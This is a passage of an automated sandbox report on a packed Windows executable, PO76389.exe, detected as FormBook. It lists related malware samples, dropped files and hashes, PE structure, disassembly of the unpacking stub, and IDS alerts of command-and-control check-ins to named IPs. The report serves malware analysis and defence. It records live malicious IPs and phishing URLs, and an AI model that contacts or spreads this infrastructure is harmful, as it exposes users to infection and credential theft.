                                                  r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                  • 103.42.108.46
                                                  3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                  • 103.42.108.46
                                                  LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                                                  • 103.42.108.46
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  NTT-LT-ASLTk8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.37
                                                  RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  Purchase order.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  r9856_7.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  https://cartoon-kingdom.frGet hashmaliciousUnknownBrowse
                                                  • 84.32.84.18
                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  NAMECHEAP-NETUSKommerzielle Bestellung.pdf (2).exeGet hashmaliciousFormBookBrowse
                                                  • 198.54.117.242
                                                  PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                  • 199.192.21.169
                                                  Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.236.169
                                                  file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                                  • 198.54.120.231
                                                  file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                                  • 198.54.120.231
                                                  k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                  • 63.250.47.40
                                                  https://urlz.fr/s6ZWGet hashmaliciousUnknownBrowse
                                                  • 63.250.43.136
                                                  SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.239.141
                                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 162.0.228.73
                                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 162.0.228.73
                                                  BODIS-NJUSPetronas request for-quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  invoice.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  file.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  Purchase order.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  r9856_7.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  x.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  bin.exeGet hashmaliciousFormBookBrowse
                                                  • 199.59.243.226
                                                  ARUBA-ASNITSecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                  • 77.81.228.77
                                                  BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 80.211.144.156
                                                  http://fotoclubsanmartino.itGet hashmaliciousUnknownBrowse
                                                  • 62.149.128.45
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 80.88.87.221
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 80.88.87.221
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 80.88.87.221
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 80.88.87.221
                                                  file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                  • 80.88.87.245
                                                  eRZQCpMb4y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 80.211.144.156
                                                  4BJoBHQ6T3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 80.211.144.156
                                                  No context
                                                  No context
                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\PO76389.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.9942541079878255
                                                  Encrypted:true
                                                  SSDEEP:6144:CqJoNJR1VXFloNANpHUvsGMZP+BdM2G7hWvU3QjOqHYc:CPPRXr4ANtUFMZqdkgKq4c
                                                  MD5:BBF11FC4431529CCCE3A6AAD01D5E062
                                                  SHA1:11B40CF650FCE7CBBB935218C22843CB1612CB79
                                                  SHA-256:33AC9A6B68D818768FE3221A4C12646D72D6D50D5D7DEB65E416666415C28877
                                                  SHA-512:499682C36C572C224D7ADF9FA5ED356DEE3771532EDCFECD1A015B56B17B1FF6CCE326A3074DFC42BE31561AD7595C2A287FE450F64E13DC951FB1CC41E7C324
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..p..4PIL..[....t.5P...z:<...MVURJ4M0HA5SJQ5R94PILMVURJ4M0H.5SJ_*.74.@.l.T....X!2.#8>R XYp*-#8:&jV(.:4[s#?..vgp$#)3{_G>i0HA5SJQLS0.m)+.k55..-W.[...kU5....q62.P...t!R..8V:.T7.LMVURJ4M`.A5.KP5....ILMVURJ4.0J@>RAQ5.=4PILMVURJTY0HA%SJQEV94P.LMFURJ6M0NA5SJQ5R?4PILMVUR:0M0JA5SJQ5P9t.IL]VUBJ4M0XA5CJQ5R94@ILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVU|>Q5DHA5..U5R)4PI.IVUBJ4M0HA5SJQ5R94pIL-VURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVUR
                                                  Process:C:\Users\user\Desktop\PO76389.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.9942541079878255
                                                  Encrypted:true
                                                  SSDEEP:6144:CqJoNJR1VXFloNANpHUvsGMZP+BdM2G7hWvU3QjOqHYc:CPPRXr4ANtUFMZqdkgKq4c
                                                  MD5:BBF11FC4431529CCCE3A6AAD01D5E062
                                                  SHA1:11B40CF650FCE7CBBB935218C22843CB1612CB79
                                                  SHA-256:33AC9A6B68D818768FE3221A4C12646D72D6D50D5D7DEB65E416666415C28877
                                                  SHA-512:499682C36C572C224D7ADF9FA5ED356DEE3771532EDCFECD1A015B56B17B1FF6CCE326A3074DFC42BE31561AD7595C2A287FE450F64E13DC951FB1CC41E7C324
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..p..4PIL..[....t.5P...z:<...MVURJ4M0HA5SJQ5R94PILMVURJ4M0H.5SJ_*.74.@.l.T....X!2.#8>R XYp*-#8:&jV(.:4[s#?..vgp$#)3{_G>i0HA5SJQLS0.m)+.k55..-W.[...kU5....q62.P...t!R..8V:.T7.LMVURJ4M`.A5.KP5....ILMVURJ4.0J@>RAQ5.=4PILMVURJTY0HA%SJQEV94P.LMFURJ6M0NA5SJQ5R?4PILMVUR:0M0JA5SJQ5P9t.IL]VUBJ4M0XA5CJQ5R94@ILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVU|>Q5DHA5..U5R)4PI.IVUBJ4M0HA5SJQ5R94pIL-VURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVUR
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                  Entropy (8bit):7.954050898703191
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  File name:PO76389.exe
                                                  File size:756'224 bytes
                                                  MD5:f28830224d4ed5b9b9b16fb45d5fd569
                                                  SHA1:1cefa43bae388468b9a931ec31f49248711de624
                                                  SHA256:5cf70c937525b712b048b9196182e3a1a988d2f112d8b7647773bcd0db23101d
                                                  SHA512:412c486dc8822b1b4b86cd6a472fdce1e65f5804059dee6e81b93866aa3c4a12f0e8c7745d8148a8d0adb1bc9c030700e4d83890ec46d27af752606a1e3acb0a
                                                  SSDEEP:12288:SXe9PPlowWX0t6mOQwg1Qd15CcYk0We1FVWKpUW6WEZ0N936NFwBI4AGI2hWKRu:nhloDX0XOf4VWvcm44
                                                  TLSH:82F4234544C5CCE5D26AA339C0F3CE84286DB5328CD57BEC9228F66DAC65343D942BAB
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                                                  Icon Hash:aaf3e3e3938382a0
                                                  Entrypoint:0x53b090
                                                  Entrypoint Section:UPX1
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66E18B2A [Wed Sep 11 12:20:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                                                  Instruction
                                                  pushad
                                                  mov esi, 004E7000h
                                                  lea edi, dword ptr [esi-000E6000h]
                                                  push edi
                                                  jmp 00007F47906D5CDDh
                                                  nop
                                                  mov al, byte ptr [esi]
                                                  inc esi
                                                  mov byte ptr [edi], al
                                                  inc edi
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5CBFh
                                                  mov eax, 00000001h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc eax, eax
                                                  add ebx, ebx
                                                  jnc 00007F47906D5CDDh
                                                  jne 00007F47906D5CFAh
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5CF1h
                                                  dec eax
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc eax, eax
                                                  jmp 00007F47906D5CA6h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc ecx, ecx
                                                  jmp 00007F47906D5D24h
                                                  xor ecx, ecx
                                                  sub eax, 03h
                                                  jc 00007F47906D5CE3h
                                                  shl eax, 08h
                                                  mov al, byte ptr [esi]
                                                  inc esi
                                                  xor eax, FFFFFFFFh
                                                  je 00007F47906D5D47h
                                                  sar eax, 1
                                                  mov ebp, eax
                                                  jmp 00007F47906D5CDDh
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5C9Eh
                                                  inc ecx
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5C90h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc ecx, ecx
                                                  add ebx, ebx
                                                  jnc 00007F47906D5CC1h
                                                  jne 00007F47906D5CDBh
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jnc 00007F47906D5CB6h
                                                  add ecx, 02h
                                                  cmp ebp, FFFFFB00h
                                                  adc ecx, 02h
                                                  lea edx, dword ptr [edi+ebp]
                                                  cmp ebp, FFFFFFFCh
                                                  jbe 00007F47906D5CE0h
                                                  mov al, byte ptr [edx]
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2012 UPD4 build 61030
                                                  • [RES] VS2012 UPD4 build 61030
                                                  • [LNK] VS2012 UPD4 build 61030
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x19fc900x424.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x13c0000x63c90.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a00b40xc.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x13b2740x48UPX1
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  UPX00x10000xe60000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  UPX10xe70000x550000x54400d8931300f6a8181c4e7b02a48d0a652eFalse0.9884145493323442data7.9360218924964805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x13c0000x650000x64200e7422cf2d25381b534673170c9a53a13False0.9490675717852685data7.938684954738563IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x13c5ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0x13c6d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0x13c8040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0x13c9300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                  RT_ICON0x13cc1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                  RT_ICON0x13cd480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                  RT_ICON0x13dbf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                  RT_ICON0x13e4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                  RT_ICON0x13ea0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                  RT_ICON0x140fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                  RT_ICON0x1420640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                  RT_MENU0xca4a00x50emptyEnglishGreat Britain0
                                                  RT_STRING0xca4f00x594emptyEnglishGreat Britain0
                                                  RT_STRING0xcaa840x68aemptyEnglishGreat Britain0
                                                  RT_STRING0xcb1100x490emptyEnglishGreat Britain0
                                                  RT_STRING0xcb5a00x5fcemptyEnglishGreat Britain0
                                                  RT_STRING0xcbb9c0x65cemptyEnglishGreat Britain0
                                                  RT_STRING0xcc1f80x466emptyEnglishGreat Britain0
                                                  RT_STRING0xcc6600x158emptyEnglishGreat Britain0
                                                  RT_RCDATA0x1424d00x5d1f5data1.000330336707487
                                                  RT_GROUP_ICON0x19f6cc0x76dataEnglishGreat Britain0.6610169491525424
                                                  RT_GROUP_ICON0x19f7480x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0x19f7600x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0x19f7780x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0x19f7900x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishGreat Britain0.5933734939759037
                                                  RT_MANIFEST0x19f8e00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                  DLLImport
                                                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                  ADVAPI32.dllAddAce
                                                  COMCTL32.dllImageList_Remove
                                                  COMDLG32.dllGetSaveFileNameW
                                                  GDI32.dllLineTo
                                                  IPHLPAPI.DLLIcmpSendEcho
                                                  MPR.dllWNetUseConnectionW
                                                  ole32.dllCoGetObject
                                                  OLEAUT32.dllVariantInit
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  SHELL32.dllDragFinish
                                                  USER32.dllGetDC
                                                  USERENV.dllLoadUserProfileW
                                                  UxTheme.dllIsThemeActive
                                                  VERSION.dllVerQueryValueW
                                                  WININET.dllFtpOpenFileW
                                                  WINMM.dlltimeGetTime
                                                  WSOCK32.dllsocket
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-09-16T09:38:08.414020+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497123.33.130.19080TCP
                                                  2024-09-16T09:38:24.846707+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971313.228.81.3980TCP
                                                  2024-09-16T09:38:27.367662+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971413.228.81.3980TCP
                                                  2024-09-16T09:38:29.944838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971513.228.81.3980TCP
                                                  2024-09-16T09:38:32.474744+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54971613.228.81.3980TCP
                                                  2024-09-16T09:38:39.260384+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971766.81.203.20080TCP
                                                  2024-09-16T09:38:41.807298+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971866.81.203.20080TCP
                                                  2024-09-16T09:38:44.354147+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971966.81.203.20080TCP
                                                  2024-09-16T09:39:06.757238+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54972066.81.203.20080TCP
                                                  2024-09-16T09:39:13.080520+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549721103.42.108.4680TCP
                                                  2024-09-16T09:39:15.619923+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549722103.42.108.4680TCP
                                                  2024-09-16T09:39:18.184785+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549723103.42.108.4680TCP
                                                  2024-09-16T09:39:20.746616+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549724103.42.108.4680TCP
                                                  2024-09-16T09:39:26.244471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497253.33.130.19080TCP
                                                  2024-09-16T09:39:29.854942+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497263.33.130.19080TCP
                                                  2024-09-16T09:39:31.392341+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497273.33.130.19080TCP
                                                  2024-09-16T09:39:36.928247+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497283.33.130.19080TCP
                                                  2024-09-16T09:39:50.728486+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549729199.59.243.22680TCP
                                                  2024-09-16T09:39:53.196514+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549730199.59.243.22680TCP
                                                  2024-09-16T09:39:55.749004+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549731199.59.243.22680TCP
                                                  2024-09-16T09:39:58.290494+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549732199.59.243.22680TCP
                                                  2024-09-16T09:40:04.087002+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549733162.0.239.14180TCP
                                                  2024-09-16T09:40:07.557349+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549734162.0.239.14180TCP
                                                  2024-09-16T09:40:10.104368+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549735162.0.239.14180TCP
                                                  2024-09-16T09:40:11.717811+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549736162.0.239.14180TCP
                                                  2024-09-16T09:40:25.435088+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973784.32.84.3280TCP
                                                  2024-09-16T09:40:27.962763+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973884.32.84.3280TCP
                                                  2024-09-16T09:40:30.536274+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973984.32.84.3280TCP
                                                  2024-09-16T09:40:33.098500+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974084.32.84.3280TCP
                                                  2024-09-16T09:40:48.170963+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549741154.23.176.19780TCP
                                                  2024-09-16T09:40:50.724097+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549742154.23.176.19780TCP
                                                  2024-09-16T09:40:53.451273+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549743154.23.176.19780TCP
                                                  2024-09-16T09:40:55.803698+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549744154.23.176.19780TCP
                                                  2024-09-16T09:41:02.161582+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974562.149.128.4080TCP
                                                  2024-09-16T09:41:04.709926+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974662.149.128.4080TCP
                                                  2024-09-16T09:41:07.236054+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974762.149.128.4080TCP
                                                  2024-09-16T09:41:09.876720+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974862.149.128.4080TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 16, 2024 09:38:06.320981026 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:06.329853058 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:06.329972982 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:06.338335037 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:06.343966961 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:08.413790941 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:08.413806915 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:08.413816929 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:08.413826942 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:08.414020061 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:08.414052010 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:08.418979883 CEST4971280192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:38:08.451050043 CEST80497123.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:38:23.908423901 CEST4971380192.168.2.513.228.81.39
